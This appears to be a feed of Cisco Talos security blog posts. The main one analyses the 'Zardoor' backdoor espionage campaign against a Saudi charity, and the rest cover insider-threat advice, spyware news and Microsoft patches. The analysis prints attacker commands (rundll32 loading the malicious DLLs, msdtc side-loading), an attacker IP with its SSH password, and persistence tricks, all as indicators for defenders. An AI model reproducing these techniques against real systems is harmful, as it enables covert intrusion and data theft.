We still see cases of the traditional malicious insiders i.e. employees who deliberately want to cause damage to their organization’s network, either for financial gain, or frustrations with the organization itself. But increasingly we are seeing another category of insider attacks – the “unwitting assets.”  

In the case of the unwitting asset, threat actors use social engineering to leverage the user to act on their behalf, typically through some form of manipulation. 

A common example is when an adversary concocts a story that implicates the user in some way, or there’s a problem that needs solving quickly. Adversaries, especially more sophisticated ones, will often ask for the target to get on a phone call to discuss the issue further.  

Once the attacker has someone on the phone, they unfortunately stand more of a chance of persuading the user to do the adversary’s bidding. This could include logging into devices and reconfiguring something or revealing important account details. 

Recommendations 

Identity related attacks are challenging to defend against. You’re dealing with the misuse of valid credentials. Finding the genuine source of them is especially difficult if users are being coerced to share their account details or conduct malicious activities. However, there are some practices we recommend that can help: 

  • Limit the amount of access a user has – no more than is required for them to perform their job.  
  • Limit the amount of consecutive failed login attempts to prevent possible brute force access. 
  • Ensure you are using MFA across your network. 
  • For IT administrators, ensure you are set up to inspect laterally across the network. Not just inspecting traffic going north/south. This will help prevent attackers who are trying to move laterally. 
  • Have a defense-in-depth approach, so that if a portion of your defense fails, other defenses can detect anomalies and intrusions. 
  • Conduct routine auditing and ensure dormant accounts are deleted from the network. This will help prevent attackers using dormant accounts to try to gain access undetected. It’s also common for accounts to be set up to test new systems, so ensure these test accounts are only temporary. Set up an automated procedure for test accounts to be disabled at the end of the project. 
  • Additionally, disable the accounts of those who have left your organization and ensure you remove their remote access (i.e., through the VPN).  
  • Have a checks and balances system in place for dealing with financial transactions so that no single person can initiate and complete a wire transfer without additional approval. This can help mitigate social engineering attacks against users who deal with payments. 
  • Addressing the abuse of valid credentials involves a comprehensive set of security measures. Consider a zero-trust architecture approach which validates every user connection to every device and every application. This will help prevent threat actors operating under the radar and across your network with stolen credentials. 

And finally, we would recommend organizations to consider actively hunting for evidence of incursion. As well as finding possible breaches, you may also detect areas where your overall network security could be improved. You can read more about this in our blog “Beyond the basics: Implementing an active defense.” 

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

8 February 2024 at 13:00
New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

By Jungsoo An, Wayne Lee and Vanja Svajcer.

  • Cisco Talos discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.” 
  • We believe an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years. 
  • Throughout the campaign, the adversary used living-off-the-land binaries (LoLBins) to deploy backdoors, establish command and control (C2), and maintain persistence. 
  • At this time, we have only discovered one compromised target, however, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be others.
  • Based on Talos’ and third-party research, the use of reverse proxy tools overlaps with TTPs employed by several threat groups originating from China. Still, we can assess the relations of the new threat actor with the existing groups only with low confidence, as open-source tools can be used by any threat actor. The choice of the compromised target does not align with the known objectives of any known threat actors originating from China.  

Talos discovered an ongoing espionage campaign in May 2023 targeting an Islamic charitable non-profit organization in Saudi Arabia that exfiltrates data approximately twice a month. 

The initial access vector is unknown, however, we observed the threat actor executing a malware we are calling the “Zardoor” backdoor to gain persistence. Then we observed the threat actor establishing C2 using open-source reverse proxy tools such as Fast Reverse Proxy (FRP), sSocks and Venom, a reverse proxy socks5 server-client tool originally developed for penetration testers. 

The threat actor customized sSocks to remove dependencies on Visual C Runtime libraries so these tools would rely only on WinAPI libraries and therefore could be executed without unexpected runtime errors. 

Once a connection was established, the threat actor used Windows Management Instrumentation (WMI) to move laterally and spread the attacker's tools — including Zardoor — by spawning processes on the target system and executing commands received from the C2, as seen in the commands below.

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

Execution flow of the Zardoor backdoor

To maintain persistence, the attacker deployed a previously unseen backdoor family we have named Zardoor, which we named based on the file names “zar32.dll” and “zor32.dll”. “Zar32.dll” is the main backdoor component that communicates with the attacker’s C2, and “zor32.dll” ensures “zar32.dll” has been properly deployed with admin privileges. Talos could not obtain a file sample for the dropper used in this specific campaign. However, we found and analyzed other available samples with an execution sequence and filenames identical to the malicious activity we observed and possibly related to the attack we observed. 

Based on our analysis of these matching samples, the execution sequence has two parts:

The dropper installs and executes the malicious “oci.dll”

The main purpose of this dropper is to configure “msdtc.exe” to load the malicious “oci.dll” payload. Depending on the target OS architecture, the dropper locates either a 32- or 64-bit “oci.dll” and drops it in the system file path C:\Windows\System32\. Then, the dropper will attempt to stop the MSDTC service and use “msdtc.exe” to help register the malicious “oci.dll” with admin privileges, using the command msdtc -install.

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization
The dropper drops a different version of oci.dll based on the OS bitness and deletes itself using a batch file.

However, if the MSDTC service fails to stop, the dropper patches the binary of the malicious “oci.dll” file to remove the strings 1ISSYSTEM and 1ISAUTORUN, and save the patched DLL to the file path, %TEMP%\win_oci_41aa0d5.dll. Removing the strings will later help determine where to save “zar32.dll” and “zor32.dll” on the victim’s computer. 

The threat actor then uses Rundll32 to execute the patched “oci.dll” using this command: C:\Windows\System32\rundll32.exe %TEMP%\win_oci_41aa0d5.dll MainEntry. This patched “oci.dll” will extract “zar32.dll” and “zor32.dll” into the Temp Directory, and launch “zar32.dll MainEntry” using “rundll32.exe”. The MSDTC service will register the malicious “oci.dll” with the msdtc -install command.

If either of these two actions is successful, the dropper configures the MSDTC service to load “oci.dll” and the DLL will be executed. Finally, a cleanup batch script is created and saved to the location %TEMP%\xz330ksdfg.bat. The batch script deletes the dropper and then deletes itself.

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

Malicious “oci.dll” payload

The malicious loader “oci.dll” contains the backdoor payloads, “zar32.dll” and “zor32.dll” in the resource section. Oci.dll contains two exported functions: ServiceMain() to launch the backdoor module (“zar32.dll”) and DllEntryPoint() to drop the backdoor onto the victim’s machine.

The ServiceMain() export is executed by the MSDTC service and launches the export function MainEntry of “zar32.dll” using “rundll32.exe.”

The DllEntryPoint() function calls the DLLMain function, which determines where to dump “zar32.dll” and “zor32.dll”. This occurs by searching for the strings 1ISSYSTEM and 1ISAUTORUN. If the string 1ISSYSTEM is found in “zar32.dll”, DLLMain drops “zar32.dll” and “zor32.dll” into the System32 directory.

If the string 1ISSYSTEM is not found, then DLLMain will look up the string 1ISAUTORUN, and if it exists, DLLMain will drop “zar32.dll” and “zor32.dll” into the %userprofile% directory. If neither of the strings are found, DLLMain will drop “zar32.dll” and “zor32.dll” into the “%TEMP%” directory. After the payloads are saved, the DLLs and their export function 'MainEntry()' are launched by “rundll32.exe”.

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization
The oci.dll contains two Zardoor components, zar32.dll and zor32.dll as resources.

To execute “zar32.dll”, the “oci.dll” export “ServiceMain()” is executed by “msdtc.exe” which then loads “zar32.dll” using the command: rundll32.exe C:\WINDOWS\system32\zar32.dll MainEntry. “Zor32.dll” is subsequently loaded from the same exported method with the command rundll32.exe C:\WINDOWS\system32\zor32.dll MainEntry.

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization
Zardoor modules.

Analysis of the “zar32.dll” and “zor32.dll” backdoor files

“Zar32.dll” is an HTTP/SSL remote access tool (RAT) that is capable of sending encrypted data to the attacker’s C2, executing PE payloads in fileless mode, searching for Session IDs, remote shellcode execution, and updating the C2 IP/hostname or port in memory. “Zar32.dll” contains a hardcoded debug symbol path seen below, and has two export functions: MainEntry() and  DllEntryPoint

PDB file path : 'C:\\Users\\john\\Desktop\\RManager\\x64\\Release\\R_Run.pdb'

Once deployed, “zar32.dll” creates three mutexes with the names, 3e603a07-7b2d-4a15-afef-7e9a0841e4d5, ThreadMutex12453, and rrx_%d, where the value of %d is a random seed that is based on the DLLs’ time of execution. If the mutex 3e603a07-7b2d-4a15-afef-7e9a0841e4d5 already exists, the DLL will exit because that indicates “zar32.dll” is successfully running.

To establish a C2 connection, “zar32.dll” needs a program that allows network applications to operate through a SOCKS or HTTPS proxy. The DLL connects to the following URLs:

  • 1.0.0[.]1/index.html
  • 1.0.0[.]2/index.html
  • 1.0.0[.]3/index.htm

The IP addresses are used by Cloudflare DNS services, including the DNS over HTTPS and the communication to these IP addresses may indicate the attempt to bypass the DNS-based detections to attacker-controlled C2 servers. 

“Zar32.dll'' attempts to connect to its C2 server using SSL with the following HTTP User-Agents:

  • 64-bit application: Mozilla/5.0 (Windows NT <os_majorver>.<os_minorver>; Trident/7.0; rv:11.0) like Gecko
  • 32-bit application on 64-bit OS: Mozilla/5.0 (Windows NT <os_majorver>.<os_minorver>; WOW64; Trident/7.0; rv:11.0) like Gecko

Once a connection is successfully established, “zar32.dll” supports the following C2 commands:

  1. Encrypt and send data to C2.
  2. Execute remotely fetched PE payload.
  3. Search for session ID.
  4. (Plugin exit).
  5. Remote shellcode execution.
  6. Delete this RAT.
  7. Update C2 IP (IP/domain_name:port).
  8. Do nothing.
New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization
Zardoor (zar32.dll) C2 routine handles eight different C2 commands.

We continued to observe several dependencies in the malware’s execution routine. If “zar32.dll” is running when “zor32.dll” is installed, “zor32.dll” will install the “msdtc.exe” service installer. 

If “zar32.dll” is not running when “zor32.dll” is installed, then “zor32.dll” starts the “msdtc.exe” service and attempts to create a mutex with the name 6c2711b5-e736-4397-a883-0d181a3f85ae

Next, “zor32.dll” will check if the “oci.dll” file exists and finish the execution if it does not. If “oci.dll” exists, “zor32.dll” attempts to create another mutex with the name 3e603a07-7b2d-4a15-afef-7e9a0841e4d5. The DLL will exit if the mutex exists, indicating“zar32.dll” is successfully running.

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization
If the mutex does not exist, “zor32.dll” will attempt to re-launch “zar32.dll” up to 10 times.

We also identified “zor32.dll” performing checks to maintain persistence if the process has admin privileges using the following procedures:

  1. If the MSDTC service is not running, “zor32.dll” will configure the MSDTC service with the command msdtc -install. If the installation fails, it will keep attempting up to 10 times.
  2. “zor32.dll” attempts to query MSDTC service status and if this fails, it will attempt up to 10 times.
  3. If the MSDTC service is running, then “zor32.dll” will attempt to stop it. If this fails, it will keep attempting to install up to 10 times.
  4. If the MSDTC service is not running, “zor32.dll” will start the service.

Scheduled tasks to maintain persistence

For persistence, the threat actor registers their reverse proxies as scheduled tasks, causing the reverse proxy to execute approximately every 20 minutes to communicate with the attacker’s C2 servers. To achieve this, first, the threat actor confirms if the victim already has scheduled tasks running with the names "KasperskySecurity" or "Microsoft Security Essentialss." Then, the attacker deletes the legitimate scheduled task and creates a new one with the same name for the proxy “msbuildss.exe”.

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

Talos observed the threat actor in July 2023 storing the remote server’s public key for future tasks. This helps the threat actor to access the remote (Secure Shell) SSH server and set up remote port forwarding, allowing remote servers and devices on the internet to access devices that are on a private network. 

The attacker downloads the private SSH key and saves it to the file path c:\users\[Redacted]\.ssh\ with the filename “id_rsa.” The threat actor also saves the file “known_hosts”, containing the public keys hosts that can be accessed using the private key stored in “id_rsa”.

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

According to the above commands, the threat actor first downloads and checks the contents of the file “2.vbs” to ensure it is the script they would like to execute. The “2.vbs” file is responsible for setting up the SSH remote port forwarding from port 443 on the victim’s device to port 22 on the attacker’s server using the user name root. The file makes sure it has successfully set up the SSH forwarding server by performing the following steps:

  1. netstat -ano | findstr 70.34 is used to find part of the remote IP address 70[.]34[.]208[.]197.
  2. The executable “shd.exe” initiates an SSH connection using the username root and the password "3My[{BK)Ni8a".
  3. Look for a port 443 connection on the victim’s device and kill “ssh.exe” and “shd.exe” using the taskkill utility.

Reverse proxy tools used by the threat actor

As opposed to forward proxies, used to connect devices on the private network to internet services, usually HTTP-based. Reverse proxies allow a computer connected to the internet to create a tunnel and allow remote access to services on the local private network.

Reverse proxies are often used as legitimate load balancers in complex system and application architectures. However, malicious actors are using them to establish communications with otherwise unreachable systems such as RDP servers, domain controllers, files or database servers. 

Fast Reverse Proxy (FRP)

Fast Reverse Proxy (FRP) is a reverse proxy tool that can be used to make network services, often located behind a NAT or firewall, remotely accessible. FRP consists of two main components: the FRP client and the FRP server. The FRP client is responsible for forwarding local requests to the FRP server, which in turn redirects them to the internet. This allows applications running on devices behind the NAT or firewall to be accessible from the outside network.

7000 is the default port used by the FRP server components. However, these ports can be configured per the user's needs. A basic setup involves installing the FRP server on a public server with a public IP, and the FRP client on the machine you want to expose. The client and server are configured via respective INI configuration files. Once the client and server are appropriately configured and started, services on the client's machine will be accessible via the server's public IP and the specified ports.

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization
FRP components and the basic usage.

Fast Reverse Proxy (FRP) has been reported to be used by several, predominantly Chinese threat actors to bypass network security measures and maintain persistence within a compromised network. By leveraging FRP, these threat actors can create a tunnel from a machine within the compromised network to an external server under their control. This allows them to exfiltrate data, deploy additional malicious tools, or carry out other activities while evading detection. 

The usage of FRP, a legitimate and widely-used tool, makes the malicious traffic harder to distinguish from the normal network traffic, thereby increasing the stealthiness of the attack. However, the presence of an FRP client in the environment may be a good indicator of potential compromise of the network where FRP is not typically used. 

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization
VirusTotal uploads for the FRP client executables.

FRP is a popular tool and has been increasingly used by threat actors, based on the increase in VirusTotal submissions of FRP tools over the past few years. 

Venom proxy

Venom is a multi-hop proxy designed for red teaming and pentesting written in the Go language. It allows the user to create a network of proxy nodes that can act as an admin or agent. The agent connects to either another agent or the admin node. The user controls the network through the control of the administration node and can easily add additional agents to the network. 

Venom allows the user, which could also be a malicious actor, to create a botnet of proxies that can be used to remotely control the nodes, exfiltrate data, install additional payloads, etc. 

The Venom features are:

  • Multi-hop socks5 proxy.
  • Multi-hop port forwarding.
  • SSH tunneling.
  • Interactive shell.
  • Uploading and downloading files.
  • Network traffic encryption.
  • Support of multiple platforms (Linux/Windows/MacOS) and multiple architectures (x86/x64/ARM/MIPS).

Other reverse proxy tools and their usage by threat actors

In addition to FRP and Venom, threat actors, predominantly originating from China, based on the previous Talos research and available open-source threat intelligence use several other tools supporting reverse proxying, most commonly:

We have also created a matrix that displays the active threat groups and the proxy tools they are using. Talos assesses with low confidence that the existence of one or more of the tools on a compromised system may indicate the activity of a particular group, as these tools are easily reusable and can be employed by any malicious actor. 

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization
Proxy tools and the threat actors utilizing them.

Zardoor attacks conducted by an advanced threat actor

Talos assesses this campaign was conducted by an unknown and advanced threat actor. We have not been able to attribute this activity to any known, publicly reported threat actor at this time, as we have not found any overlap between the observed tools or C2 infrastructure used in this campaign. 

The threat actor appears highly skilled based on their ability to create new tooling, such as the Zardoor backdoors, customize open-source proxy tools, and leverage several LoLBins including “msdtc.exe” to evade detection. In particular, side-loading backdoors contained in “oci.dll” via MSDTC is a very effective method of remaining undetected while maintaining long-term access to a victim’s network. 

Coverage

Ways our customers can detect and block this threat are listed below.

New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 61913, 61914 and 62371 - 62380.

The following ClamAV signatures have been released to detect malware artifacts related to this threat:

  • Win.Backdoor.Zardoor-10019732-0
  • Win.Backdoor.ZardoorVMP-10019731-0
  • Win.Backdoor.sSocksProxy-10019733-0
  • Win.Backdoor.VenomProxy-10019734-0

MITRE ATT&CK Techniques

Command and Control

  • T1090.003 Proxy: Multi-hop Proxy
  • T1105 Ingress Tool Transfer 
  • DiscoveryT1018 Remote System DiscoveryT1033 System Owner/User
  • DiscoveryT1049 System Network Connections Discovery
  • T1057 Process Discovery
  • T1087.002 Account Discovery: Domain Account

Persistence

  • T1053.005 Scheduled Task/Job: Scheduled Task
  • T1574.002 Hijack Execution Flow: DLL Side-Loading

Execution

  • T1047 Windows Management Instrumentation
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
  • T1204.002 User Execution: Malicious File
  • T1574.002 Hijack Execution Flow: DLL Side-Loading

Exfiltration

  • T1048 Exfiltration Over Alternative Protocol

Privilege Escalation

  • T1055 Process InjectionT1574.002 Hijack Execution Flow: DLL Side-Loading

Defense Evasion

  • T1055.001 Process Injection: Dynamic-link Library Injection
  • T1070.004 File Deletion
  • T1574.002 Hijack Execution Flow: DLL Side-Loading

IOCs

IOCs for this research can also be found in our GitHub repository here.

Spyware isn’t going anywhere, and neither are its tactics

8 February 2024 at 19:00
Spyware isn’t going anywhere, and neither are its tactics

Private and public efforts to curb the use of spyware and activity of other “mercenary” groups have heated up over the past week, with the U.S. government taking additional action against spyware users and some of the world’s largest tech companies calling out international governments to do more. 

The illegal use of spyware to target high-profile or at-risk individuals is a global problem, as highlighted by this article from The Register that Talos’ Nick Biasini just contributed to. This software can often track targets’ exact location, steal their messages and personal information, or even listen in on phone calls. And as we’ve written about, many Private Sector Offensive Actors (PSOAs) are developing spyware and selling it to whoever is willing to pay, regardless of what their motives are. 

A group of nations including the U.S., U.K. and France, along with several Fortune 500 tech companies, signed an agreement Tuesday to work to limit the use of spyware across the globe and crack down harder on bad actors who are illegally selling and using the software. However, the language of the resolution seemed closer to aspirations than actual action. 

For their part, the U.S. did roll out new restrictions on the visas of any foreign individuals who misuse commercial spyware. The restrictions could also affect anyone who makes the spyware, profits off its sale or facilitates the sale of the technology.  

These are all positive steps in the right direction toward curbing the use and sale of commercial spyware, but I remain concerned that the tendrils of spyware are too deep in the security landscape at this point that we’ll be dealing with this issue for years to come. 

Google’s security research group recently found that 20 of the 25 zero-day vulnerabilities Google TAG discovered that were being exploited in the wild in 2023 were exploited by commercial spyware vendors. In the same report, Google TAG said it was actively tracking at least 40 commercial spyware vendors — all with an unknown number of customers, users, creators and employees.  

The general tenants of spyware are all around us, too. While not traditional commercial spyware that’s tracking journalists or dissidents, even just quiet trackers are being used all over the internet. 

A report from 404 Media last month found that the apps of several popular sites like the 9gag forum and Kik messaging app were part of a massive network of ad tracking. Reporters found that ads inside each app are sending information to a powerful mass monitoring tool, which is then advertised and sold to national security agencies. This information can quietly build profiles out of users that could be used in many ways (though hopefully just for targeted ads, in the absolute best-case scenario), including tracking their hobbies, family members and physical location. 

Meta’s popular social media sites Instagram and Facebook have their own sets of tracking tools that can even monitor users’ web activity outside of their apps and require users to manually turn that feature off. Some mercenary groups are even embedding spyware into online ads and spreading spyware with little to no protection on mobile devices

Just as with ransomware, the problem of addressing spyware and PSOAs is going to take an international, public-private effort, and it certainly won’t be solved overnight. But I believe it will take more than good faith resolutions to change the way our internet activity is tracked, and how attackers can exploit that in a worst-case scenario.  

One such way we can start taking steps to immediately curb the spread of spyware is with greater communication. Talos encourages any organization, public or private, to publicly share actionable information or detection content related to spyware discovered in the wild. Public disclosure is often limited in the number of technical details of how the spyware itself works or does not contain many IOCs.  

If readers suspect their system(s) may have been compromised by commercial spyware or hack-for-hire groups, please consider notifying Talos’ research team at [email protected] to assist in furthering the community’s knowledge of these threats. 

The one big thing 

Cisco Talos discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family named “Zardoor.” Talos believes an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years. In at least one attack, the actors have infected an Islamic charitable non-profit organization in Saudi Arabia, often exfiltrating data multiple times in a month. 

Why do I care? 

At this time, we have only discovered one compromised target, however, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be other victims that we don’t know about yet. This also is the work of a yet-to-be-discovered threat actor, as Talos cannot pin the exact TTPs onto a known threat actor. Zardoor is a dangerous backdoor that can remain undetected for extended periods, and without a ton of prior information about this actor, it’s tough to predict where they might pivot next. 

So now what? 

Talos has released new ClamAV signatures and Snort rules to protect against Zardoor and the actors’ actions. We don’t know what the initial access vector is, so it’s tough to give targeted advice on how to avoid this malware, but having any endpoint detection in place will block this backdoor.  

Top security headlines of the week 

Adversaries are actively exploiting three vulnerabilities in Ivanti’s VPN software, including one newly discovered over the weekend. Ivanti first disclosed two vulnerabilities on Jan. 22 affecting Ivanti’s Connect Secure and Policy Secure VPN products. Eventually, attackers took notice and started targeting unpatched instances of the software. Shortly after disclosure, the U.S. Cybersecurity and Infrastructure Security Agency only gave federal agencies 48 hours to disconnect any devices that used the affected software. Patches are now available for the three vulnerabilities, and users are encouraged to update as soon as possible. The CISA directive said that “agencies running the affected products must assume domain accounts associated with the affected products have been compromised” and said that agencies should reset “passwords twice for on premise [SIC] accounts, revoke Kerberos tickets, and then revoke tokens for cloud accounts in hybrid deployments” by March 1. It also said, “for cloud joined/registered devices, disable devices in the cloud to revoke the device tokens.” The newest vulnerability, CVE-2024-21893, is a server-side request forgery that could allow an attacker to access certain restricted resources without authentication. (Ars Technica, Decipher

Apple addressed a security issue early in the life of their newly released Apple Vision Pro, a mixed-reality headset. Days after initial reviews for the product were published, Apple released its first security update for the headset, saying that a vulnerability in the WebKit browser engine “may have been exploited” in the wild. The vulnerability, CVE-2024-23222, also affects other Apple operating systems, including iOS and iPad OS. Vision Pro users also discovered that, before the software patch, they could not reset the password on their device without physically bringing the headset to a retail Apple store. The passcode, typically a series of digits for the headset, could only be reset if the users gave the physical device to Apple support or mailed it to AppleCare. However, Apple added the ability to reset the devices’ passcode in the same patch that fixed the aforementioned vulnerability. (TechCrunch, Bloomberg

Can’t get enough Talos? 

 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf 
MD5: 2cfc15cb15acc1ff2b2da65c790d7551 
Typical Filename: rcx4d83.tmp 
Claimed Product: N/A   
Detection Name: Win.Dropper.Pykspa::tpd 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934 
MD5: 93fefc3e88ffb78abb36365fa5cf857c 
Typical Filename: Wextract 
Claimed Product: Internet Explorer 
Detection Name: W32.File.MalParent 

SHA 256: 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440 
MD5: ef6ff172bf3e480f1d633a6c53f7a35e 
Typical Filename: iizbpyilb.bat 
Claimed Product: N/A  
Detection Name: Trojan.Agent.DDOH 

SHA 256: 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7  
MD5: 0e4c49327e3be816022a233f844a5731  
Typical Filename: aact.exe  
Claimed Product: AAct x86  
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos 

SHA 256: 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e 
MD5: 040cd888e971f2872d6d5dafd52e6194 
Typical Filename: tmp000c3787 
Claimed Product: Ultra Virus Killer 
Detection Name: PUA.Win.Virus.Ultra::95.sbx.tg 

First Microsoft Patch Tuesday zero-day of 2024 disclosed as part of group of 75 vulnerabilities

13 February 2024 at 18:59
First Microsoft Patch Tuesday zero-day of 2024 disclosed as part of group of 75 vulnerabilities

Microsoft followed up one of the lightest recent Patch Tuesdays in January with a large release of vulnerabilities on Tuesday, although still far from numbers seen in the past. 

In all, February’s security update from Microsoft includes 75 vulnerabilities, three of which are considered critical. There are 69 “important” vulnerabilities, according to Microsoft, and three that are of “moderate” severity.

Although considered of moderate risk, one of the vulnerabilities is being actively exploited in the wild — CVE-2024-21351, a security feature bypass vulnerability in Windows SmartScreen. “Smart screen” protects users from malicious websites and files downloaded from the internet. Exploiting this vulnerability may allow a user to be tricked into downloading and executing a file from the internet without the traditional SmartScreen protections. There were no zero-day vulnerabilities disclosed in last month’s Patch Tuesday.

Of the three critical vulnerabilities, one (CVE-2024-20684) could allow an attacker that controls a Hyper-V guest to cause a denial-of-service attack on the host and, as a consequence, to all other guests of the same host.

CVE-2024-21357 is another critical remote code execution vulnerability in a multicast network protocol called Windows Pragmatic General Multicast. The vulnerability could, in theory, allow an attacker on the same network to execute code on other systems on that network. Microsoft considers the vulnerability exploitation complex, however, the company does list it as “more likely” to be exploited.

The third critical vulnerability (CVE-2024-21380) is an information disclosure vulnerability in Microsoft Dynamics Business Central/NAV. According to Microsoft, the exploitation of this attack requires user interaction, and the attacker must first win a race condition. Therefore, it’s considered to be a more complex attack and “less likely” to be exploited.

Cisco Talos would also like to highlight CVE-2024-21378, a remote code execution vulnerability in Microsoft Outlook. However, according to the advisory, this requires the attacker to be on the same network as the targeted machine and trick the victim into opening a specially crafted file or email.

CVE-2024-21379 is also a remote code execution vulnerability, this time in Microsoft Word. Exploiting this vulnerability requires an attacker to send to a victim a specially crafted Word document that, when opened, would allow remote code execution in the victim’s system.

The advisory contains 26 other remote code execution vulnerabilities that are considered “less likely” to be exploited. A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63000 - 63001, 63004, 63005, 62992 - 62994, 62998 and 62999. There are also Snort 3 rules 300822 - 300826.

❌
❌